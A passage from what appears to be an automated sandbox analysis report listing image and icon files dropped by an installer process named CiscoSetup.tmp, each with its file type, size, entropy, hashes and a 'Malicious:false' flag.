                                                                                                                                      SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTcm/smdB4cT3NGDBWPryd:TSDS0tKg9E05Tcm/smAkMEPed
                                                                                                                                      MD5:CE71A3CEA2599D3A31ACAA9B55CA11E7
                                                                                                                                      SHA1:0592CF53E554F95BC722A21AF3CC9DF896BB6108
                                                                                                                                      SHA-256:0E0CF343355B77AA93DC0AFA9AFF96FF64EF5DFE73E9AAB57ECAA776BEC7EE7A
                                                                                                                                      SHA-512:D04AF6ED7247BCF61C969C1668A0F8F62CBA4A83E08CCFAE63755F56A4F6D49F9B1E39FABB10A3C04675828379658AE8FE414AC7682F7211C4A5F8949224E7EF
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 1 x 38, 8-bit colormap, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2213
                                                                                                                                      Entropy (8bit):4.905752993252195
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:iY/6A64knA9WIiDYfv4c0POd9Od4LOR3POgHWv:iYSGknmWIiDYfQpOd9OdqOVOgHWv
                                                                                                                                      MD5:A3A99D7E09DE348A18379BA84F5FBD33
                                                                                                                                      SHA1:7E7BE73D74601EA7CCFE7389152D189DA10A275F
                                                                                                                                      SHA-256:A8F0C8E087C47D78EBC0D0D9FBE4BF124F9049BE49A4D7E919D80CEF3E294FD7
                                                                                                                                      SHA-512:414293559F4245B4065246C582D815582E4DFF1E0882CDC3B0439E66204916B9C372D5430C77C49444CB69F61C715337C67275773D76E36C377AB287FEAC2E8E
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1916
                                                                                                                                      Entropy (8bit):7.856747119568193
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:22S/53y4Zw3U0f7kxCsJUAxuLYSze4OnbQipPVeOh2JaM9:2lA6aU0fITJUA5Sze4AbQuPVmJaM9
                                                                                                                                      MD5:88A7B064DF22129CF129C4C589E1A92E
                                                                                                                                      SHA1:FE205F326656F8468B6FF7B9702B26E0BA450D35
                                                                                                                                      SHA-256:2E7D51E65DE4287C47C4BA96A394FD678F56F6A4BAAD7E35407BDD7D52DE500D
                                                                                                                                      SHA-512:87015E250E1659A0C5A90C85F85D01DC3B19AE079BA2574A2F6276AFF97E89A6B90BA5AB855EBC7B29AAB26C4ADB64B44EE64E210DCD0A02CCE70529D0FC3910
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12252
                                                                                                                                      Entropy (8bit):7.977665916091742
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:wld0FFxadXOHqBRtSDkAW0C6j7dNirKFbu+MMIxh0kOeg+Y/meTYeJlJlFrQ/:2oFxTqvt4TW56j7uraNw70kkHd/Jnk
                                                                                                                                      MD5:864800C5743CB649C4616758EA169E4F
                                                                                                                                      SHA1:3A02818977AF60D5DA37011CFC35DF11FC467906
                                                                                                                                      SHA-256:EF07FC7A9E194C9F076CF86C65E292816AAF666C00400A0BE8F70FB7740E902B
                                                                                                                                      SHA-512:ADE99880BB1B1A1FE3ED348AD625D6301FE8631E594E1CCBBE8678245F5B1EE2BBF93BEF7101698CF909E93CD4BBF005DD20466D3A278A9CACE91B324A23A48B
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1702
                                                                                                                                      Entropy (8bit):7.836409910643584
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:MSsuOJ3aklIveNn3uRjOIi4d6R2LA+KdrIF0Nl3BqL7goSlO2Ywdq8XLxTGO:MD35lIvmnsT8gA+GsFvkoSVdxl
                                                                                                                                      MD5:2A93A2F714FAB48B6CD5BDF1533EEFE2
                                                                                                                                      SHA1:727D59B41389E63AD6149117E83035CE8DECD59D
                                                                                                                                      SHA-256:7982204EE803716D70B99C224A4A1F3AA10CA0AC012CF33802A3E305B72AB8AF
                                                                                                                                      SHA-512:B4F04174C5B0691F65C4304B5EFC23C5533FF72092F15C03EDBBFBA103158C79FD0F890A7509EF84D85CD662AA849525FDAE1BE9D91016214BF5B1262EA735B3
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):10811
                                                                                                                                      Entropy (8bit):7.9725003667897125
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:xGW6GZ0zrJJ+M0jTsGzV2jysFfqybOB4twma2iNrHbC4ussE84u:xMZUTsGirFioOBg49VvusV84u
                                                                                                                                      MD5:A805DED6582E8382AB22EAF761559ED7
                                                                                                                                      SHA1:2C5C4C718AFC5566FB5D6B458CAFB04AC96B6A13
                                                                                                                                      SHA-256:393968B4F0F62527169D0D3DB56D756DE094D6F91252536BCD08770B83C98446
                                                                                                                                      SHA-512:F47219CE8D631FB79BF9FF67D24B57253A5F56E2DF98A35C5769D84A101E6E6ADA66D2B2E1FA6B1141087060200F97E48EA01B99CBE9B81FFA727E76ABA07713
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):543
                                                                                                                                      Entropy (8bit):7.547901309478316
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:6v/7CWdT8JNBxFtHpTJKAghnooED91TFxff+Tye5N3Q2+ah7:KT8rBztJYnCjT3+TN5N1B7
                                                                                                                                      MD5:5D99349B36EE267BD85E3A4E4C8B9D09
                                                                                                                                      SHA1:AF5F88451BA51F5FBAE5D3D603655138EE78D27F
                                                                                                                                      SHA-256:84EF9A5D991E3B3E68AD6F7B8F2D9F279769DC9D27BBB205C3AB9B2BC1607ACA
                                                                                                                                      SHA-512:58C4E4CDD9B7D5C660A40467F504137D1779222AF24DAFFABB495DBD476A65940E93EF7E8EE7F9BF69A4C4F560D6BA5FB4EEC4DE81C77E4383A24D7B0110DA85
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 1024 x 365, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):16443
                                                                                                                                      Entropy (8bit):7.760065707691873
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:lqb0tEZvDwb6EjHGVbAxe76N2Tuzy8xvyu6:lY02FP8nsUxvyu6
                                                                                                                                      MD5:E786715A35FEB88334AA7FAA35F70248
                                                                                                                                      SHA1:2BB7D79511CA0099549DAA71263909D61789B54D
                                                                                                                                      SHA-256:0D5106D9C61EC53AC64D4663204A75F5257B41E24991F1D6CCD50471CF81C341
                                                                                                                                      SHA-512:4DF4F567FB4B1184610D1884D13F75C474757641F64CA05B6333391C12B7AFA0D7889F4DB374AB54F69E262EE4B12FB89A12E037A8F2926E01ED457D233DE3F9
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2531
                                                                                                                                      Entropy (8bit):7.8827223365027725
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:PajMqdGnKe/dujhrZicEFhViZIs2sJ69y+10zTECChhrHxgpj:PaIqcnKeKZHg7by+ezTLUhrR+j
                                                                                                                                      MD5:2EA165B23D882176DAAD7C368EE24642
                                                                                                                                      SHA1:A46B746D76A41D4B322552BE4D66E9FAC66D7C19
                                                                                                                                      SHA-256:5B0F218A1EDB9CE79C15E8278557CCDB8AF44EAD52B4149CBC27DEF6FFE38619
                                                                                                                                      SHA-512:7C6C1F9FBDB726AF81551CB2CB790B847904E10AB90923A8FA43C34D617FD4A7F4B0A6FC85D327FA140D8C42197213F2A2BBB4643C16A1FC7DF17C1AF1E674FC
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2106
                                                                                                                                      Entropy (8bit):7.848629133083243
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:gySVFiuSZgKTkBsSS/Z89Vn1MM1DCINukyd5Wb:gySBSZCqBhen1MM1CINgsb
                                                                                                                                      MD5:85D427479A5F8E6F69DEB0A5EC7E6DBF
                                                                                                                                      SHA1:95414451D6AE9B130831A1C297151F65AD849A6C
                                                                                                                                      SHA-256:CF8B60054D290DFA6BA59086BF18F5ED0718C721B4ADD200AC95275E5457AB58
                                                                                                                                      SHA-512:58248F232F27441ACB81B0A6AF2272D19EE1710101C3675CCAEA4BA3CE8A74D664053C58EF2D9C948F2ABCCA4F30B5ACF633A2EA53C8E260BB40FA6F1214151C
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:Targa image data - Map 32 x 2841 x 1 +1
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):431993
                                                                                                                                      Entropy (8bit):4.565786626694248
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:qG481XVja/lkbbVYHd6saT3N2z00cAXoKM0Baf0I:qC3a/lkbbaHd6saT3QZnXdBZI
                                                                                                                                      MD5:A6441E0D126BDAEB1308C9B4EB5D30D7
                                                                                                                                      SHA1:07206E99763B97507D5D7BCB3DF221F48ABF60FF
                                                                                                                                      SHA-256:5A624CBE0242B49FE13104345760BD16F6B2D50F1AC9FB19B92F76BDBBED938A
                                                                                                                                      SHA-512:DC85660518234A581F3EA19FB5892F53B1BA3671293F5BB886AD63D91CCEA0AC31E55ECEA528487AF1BC343CF226E268CF50B4903D67430919FD9B715889EB7B
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12436
                                                                                                                                      Entropy (8bit):7.977312501768235
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:9duiLviw1Tg2WOFeuMhEhKPewOSJKVBpFGo5cJUs1P3X3cI78saDjy6Z7KiasZM1:7vJ0OYhbPWEKLaoe9dXsI789HZTla
                                                                                                                                      MD5:3F1083A6458C2CC3E9743D03ACB0D349
                                                                                                                                      SHA1:280DA65E961DAC251D6394A234E92FB110DBC998
                                                                                                                                      SHA-256:78A87D7B4CDA2E04CF4A608C78CE627450E15CD75AE121B4D72466837197D096
                                                                                                                                      SHA-512:250604CE42BD866B870A50B01E892036364DBBBEA1AC58EF60B3E4E38513A9DADE3987459FBD83681435D74521B368550DFE329E70CDD84837BAFCD2E43B53A2
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):3.4732129504366194
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:h6QRIHYm77Z5IVpIHwuS0g72HR1K9TEYkbGg2o:iHY0TUuUSHRAQXHx
                                                                                                                                      MD5:E61CF737A35E8DB52178528A0CBFE702
                                                                                                                                      SHA1:DE0A794D67A3DEF7079CEC7C48AC580CC71A7270
                                                                                                                                      SHA-256:559C518DC1F316C4991DC95D131CAB0BDAC445B1CE41B28EC8244CDD78F8AB2F
                                                                                                                                      SHA-512:8563013E9A2B75F5EDF00D71A292634FE375D5F6670F7F303C2CAB2DC271FDFC04A760417E2D487269D26611F6D236E6164EFC3179452AB34B1D42ABC17C51B6
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4455
                                                                                                                                      Entropy (8bit):7.908038022091361
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTIaLT1ZWqwPFR34mH:TSDS0tKg9E05TBZWqqPH
                                                                                                                                      MD5:2E3C536FBC9DDA9D0DA7DD408FA3D69B
                                                                                                                                      SHA1:4056553645ACFD51D5BB1E74623ED9938C0F5717
                                                                                                                                      SHA-256:D86F0CEDDF46C275DF0FC6CF0FE70852DD270D0BC35355CC6B30CE7DDD6EC2B7
                                                                                                                                      SHA-512:AB3237097BBA665CC1B22F4A4C280C6141E8266EA9D4A569C3B53D4401E00F4E1E0F7944A172C16CDD455AF8EAF3EAA9FC43A08EFDFE7844689BFC7B4CB870F1
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2274
                                                                                                                                      Entropy (8bit):7.88487369762579
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:ANENb8K8isarhoHup4l7Hn5MPuvW5LApZJ+WoXY:Bbx3rGHupubC6NpzSXY
                                                                                                                                      MD5:02AA7BFBC5519A9410E0D27732A6A163
                                                                                                                                      SHA1:9DDE546C6090CA4BD8BE58F8625A6AE25D440E6E
                                                                                                                                      SHA-256:B08A8AE17D62E9CF9D6E91E59955AF91E1B126FD82BC1071BDAFEE8AB6818253
                                                                                                                                      SHA-512:323777E1ABC44F643AD6AE581970D551D6BB94DF485377E91DB411ED8B839C47F8490002DF9756AD340BC19D8676050A620A1008F211B3AC32C39BE37CD35093
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1807
                                                                                                                                      Entropy (8bit):7.846793911413473
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:M3uM24lXN+maawwFvEk9PMjKHcdAJ5xo+n7R/0+5GpxwGjQaTNn7ohEoGCL5F2lr:M+VU3vVsk9kcqE7RN+x/BohRnG
                                                                                                                                      MD5:536C911881523B9F8402A481881992A0
                                                                                                                                      SHA1:2748A03D65DA7D6B4A95ACBDEB6ECD6F409A0ABF
                                                                                                                                      SHA-256:246B7E52A41AA64365D84C7DA73FD20C27B8C825C61394AE8C775DBD9BF5B668
                                                                                                                                      SHA-512:608DFEC9C7980707B9947F3CFB8BEF93FDF1D6D5B908E25888BCA0C7CE83C70F23AF87798F38E364E75FA05C89523028B5742E3084E6401068A7DE6BC5BF90E4
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):417
                                                                                                                                      Entropy (8bit):7.261808950496785
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:6v/7ye/67M2KK09AtPNFPQM7vcvei4A62GCv+OQRWqxEz:de/YM2KYBTcKA62VWvE
                                                                                                                                      MD5:E49813F0A990FD98318710C0F0BFDA21
                                                                                                                                      SHA1:FD09D47A8BA649393221D5048D3BFF1FFADD3496
                                                                                                                                      SHA-256:79C957FB0133496B0266E8F5441982D3F1DAB781B90FBC34F59D75968577CD61
                                                                                                                                      SHA-512:8883387871CBE8B3778F5D95A95700D99B7D4737696051436C06060C645F83E25255A76AA73CD5BA1B03FC5797D8F6B99D1B0E489B5421D26D4E7DBFD358EA65
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):9736
                                                                                                                                      Entropy (8bit):7.95835565935799
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:uGw9FbNic2CTLMZgb0OeuEqR0+zipNb19+MUs2b4uLbFv7MLlELHz5FijB:uZ95jOAdE+0+mpNB9dObfR4LiLHz5QjB
                                                                                                                                      MD5:64C1592AB32B98889AFDB7F216B3A535
                                                                                                                                      SHA1:9DA1BF63D0E9CCF65BA0C72E615099AD30DDB2EB
                                                                                                                                      SHA-256:B649B2B24F635758C6B424EBADA07097ABB56CE73E46F056268004D79575AA8F
                                                                                                                                      SHA-512:CA8376AEB64FE49CE253BEE7F949AEBFDB6C1EAD6270C739B09751CEEA313407F7AABBA7388E4ABFA53A48A322D827EF6D4FF1D458C3FB815239407646D53C84
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2860
                                                                                                                                      Entropy (8bit):7.914852791051157
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:1vgVWGnIUiSbzr6C6bm/8B3fMKfxYtg+hRKdQr5iQGAOUnonGVY5Q14pUcblw/Gu:1YIUxbavbmUZxYtVXABUno7Q5cblwDSI
                                                                                                                                      MD5:DA68BAC3A525CC1ACE0BC4836A49D3D5
                                                                                                                                      SHA1:5C7D343913F75C7595BBA487031056B54F2AC6CE
                                                                                                                                      SHA-256:DC088A5CD630537A875466B7278DDDE0E54203C733D0950F67B0D3896B671A09
                                                                                                                                      SHA-512:A5F4BCC1A2CADF82927CEBD0373694086BDF955D7B755118255AAE3FA7CF7EB05748C81B35A759A8202991B2B2D5F77709FC84C58D0554430BE3AE8B51519264
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 375 x 23, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):700
                                                                                                                                      Entropy (8bit):6.305816801627044
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:6v/7B0J+UJbp92cDPuY1qHlnv/pebLaeb9Lf43DQ6TjpuIXG13DQ6i5t2c:0erLYWuqylnv/pe3aO9KDUIXO3D+/
                                                                                                                                      MD5:894AB8F4298F2238292E31BAB5CCAB10
                                                                                                                                      SHA1:FCFC29B4E5BAC3C59EDA1F8837087E768F7B0A7B
                                                                                                                                      SHA-256:7C8B5EC8C7DE5405AAEE5B1E92C605020424AED8AF830C2429ED47883561A39D
                                                                                                                                      SHA-512:B7F06E961C2C2BAC0EFC5633E213D90E3206093593988BD04CE84DA13B1D1B4F0B83DEB77FF247E6681A645004FD37C2866FF83EB7A6A5E3E581B0868AB58C3E
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 1260x1024, components 3
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):399779
                                                                                                                                      Entropy (8bit):7.9639437199622165
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:NZGJOTaTKegfZjGiFfyHLyforThgWTZcWX1nQ8WMsETaVovwV:/JT6g5JyjrThgWTZvQ8lsvVnV
                                                                                                                                      MD5:DF0BDC3CDA98B3BE333FEB2A2770002C
                                                                                                                                      SHA1:D0FED726183EBEA0B535EE06A66805E7BF3C9386
                                                                                                                                      SHA-256:FD3413367D94F80DC520390C0971F9AA44003C9C6F32BCBC3303A6682D0B0175
                                                                                                                                      SHA-512:46F9DA519D7D8E1D192D9EB6082FBEAAE164EC58C97C22BB576B8DEEC387B57FFC8CF8BF75412C8FD2B30B9962B96070A679F2E26558099B5DB4411A59E0386D
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):31702
                                                                                                                                      Entropy (8bit):7.968827949628217
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:j9rxAm3IyJR5xmDQXMUg0HvpXOQFvgMN/2iHxr:j5X5AVUjEQ9NVRr
                                                                                                                                      MD5:D7A6605937F7BE6861ED243FEED7B2AF
                                                                                                                                      SHA1:CE9EFBCE4C470923C242615A0B53E775800BB031
                                                                                                                                      SHA-256:331F0FB3EAA0F38927DD0B350A6D92B8E18ACFDF64CBC597B470EF6E4D055C81
                                                                                                                                      SHA-512:A9C1C5503D9987245389C762ECDA0F4803BD84CC3D47534731F9194BB33DF93C7FEA6569D6E0BE03C4A59551B4F8021AA129A38FFF653FEB81B5DBF065438FCF
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 300 x 40, 8-bit/color RGB, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1577
                                                                                                                                      Entropy (8bit):5.942243839150427
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:HA/6I1hxWwUyl3ZknA9VYVhEfNA6h+REMmcI1VCnw7Pl3Vv7aHH3yGNbBg:g/6G6GknA9Wg26x/c0eG3tmHiGg
                                                                                                                                      MD5:8675E6CF868FCE7270D170D83CE58757
                                                                                                                                      SHA1:B08567ACEF2380521759E4A1C12B1C9FE657ABED
                                                                                                                                      SHA-256:593A68E8FC7ADF787E5728D044AC71D4A9BEC6E4A6BF15895ABC8C4869F33625
                                                                                                                                      SHA-512:6480B3304656ECA345326A96FEF93B653B9F40550E5B0D14498B2670BAFB497E78A2517911F8E791E1DEC3C9A3070CB4212DB727FBE3FC648F6100E5EF349B2F
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):3.7071518309363354
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:rtQAZDlpb/oRjRgvFBvOcVYVWZahUNZGIJMWz6izv2dBtj33xNCpK0v6wxrf0Dgk:rt/Md6vFBXKWIhUNky4X3IrvX1sDgro
                                                                                                                                      MD5:1C98B43E6778943A5358BE61A90BA74C
                                                                                                                                      SHA1:5267802FF8108EA1709CFEB6C156A7AA5D6140BC
                                                                                                                                      SHA-256:BCE250F3AEA36B7A76C5D4D73B03CE83A7988BBFB6F6AA69C92475C39DABC22E
                                                                                                                                      SHA-512:7C10E7FE2D1A476D0A923937597B95D505FBE6978ED4518A99F1FC391CB6281CE8A0F94F3772C83ABAEF916B6834BB5490833BF60BB3B9FA67D61CA0B7C16015
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):10239
                                                                                                                                      Entropy (8bit):7.950564187811269
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:uTeKIu+Nxu1/eEefaoIgGSw78i5GJssnezz3Gu5cMrvF6AO:uTeg+NkdeCodGSiV3dcI96AO
                                                                                                                                      MD5:7DADB01AC22B7AB6F313726AD5977675
                                                                                                                                      SHA1:274554CDEB3971D3A9250AA0A7597F8B41D17000
                                                                                                                                      SHA-256:EBBA9313774314E18ABB4F4342B1C0C93DF22DD45146C6E84A08EB39BD419825
                                                                                                                                      SHA-512:C77FA7F8791A4852DBA2C9402D705E6C4CDB92DAAF71CD5F46EA8AD6EA35E41D4CFF42296C2F08133A82AE1F31DCA05C61B29AC291F85BBE4C7FDF088A4F0866
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2245
                                                                                                                                      Entropy (8bit):7.881067272381913
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:RTfEfdH62oMLD03CqIngSp9wZM/vgRzmD0XQ8/CvbJkfG2:RwfYHt6qKmzmD0g8/Cv9kfG2
                                                                                                                                      MD5:FC4A9201524066297A4C6DD0760D646C
                                                                                                                                      SHA1:7B6B7710A1B9EEDAC515FEEE90728A405AC07937
                                                                                                                                      SHA-256:B19294D4FF3378820B91BF8D2DBC53CB9C8BB531A5CA7E0F4C728AC757C0CD29
                                                                                                                                      SHA-512:2597C04C2740000747731CB3FF55E7C15675D86578CD0FC73A8F04D84CD084142BF0BFAE55DD81B6AFA1CDE2585EEF233B9BBAB1C05655B3099FA1BBFAECD3DD
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):51094
                                                                                                                                      Entropy (8bit):7.977081753425093
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:UoAL5K723jk6waeSXMFYcQotAtZJqyGlOk6bAfb1:Uv5YAjkCeS8u6tAnwwTbe1
                                                                                                                                      MD5:BBD0533637DA4102A6DC250FB20D6FA7
                                                                                                                                      SHA1:B78DC64053313A61F3C25550D17C2700923B1EF0
                                                                                                                                      SHA-256:C4D28DB251B9D72B2EF84EB9774F028FFDB65E432451E79E50D51A497D8196B9
                                                                                                                                      SHA-512:A3B17D20439BE297AD034827FD5B9EC40DB2D3B597D76431F29AE4C72C2647546DAB7696A05B3007C6796862CA67F7EDD41D8826C0D41BB55139A1D58CE23C46
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):4.044905068349432
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:m/CRZkMiOjTrP2GqirkNv05M36iJpx8wpeXlUA9S5Sxgo2vo:mqcaTrP1zr804FjiUA9s4g7o
                                                                                                                                      MD5:1AE447E7E6E48D922E20DACEBEABF6B7
                                                                                                                                      SHA1:405E8A92B647B62F189B88AF58F1473C53F09991
                                                                                                                                      SHA-256:40107A62ABD4DE28E722EC92905913E24873CD9E10C21CEE50698949AB76C358
                                                                                                                                      SHA-512:F703E7D8AE70589C75F722BE8D64C9D136A524ADDD3AE39D0ED94C32C632EBB2E0EECB61C08342564AE42445B4146E10CED0ED4EE783DDF3785CC6D7AA124440
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 300 x 40, 8-bit/color RGB, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1601
                                                                                                                                      Entropy (8bit):6.01754566314674
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:g/6G6GknA9Wg2A/c0glTl3clp3glfHiucV:gSuknmWg2A/qlTlslelfHiucV
                                                                                                                                      MD5:1F1425233D56C7381E8A1B9544656A3F
                                                                                                                                      SHA1:13DA3D280A4561F9018BFDF2C55396862B42C3BE
                                                                                                                                      SHA-256:FD348FEFE62E962AD34D03B3639E850AAEDCEAD2585311F8F665EFFF9319A6BA
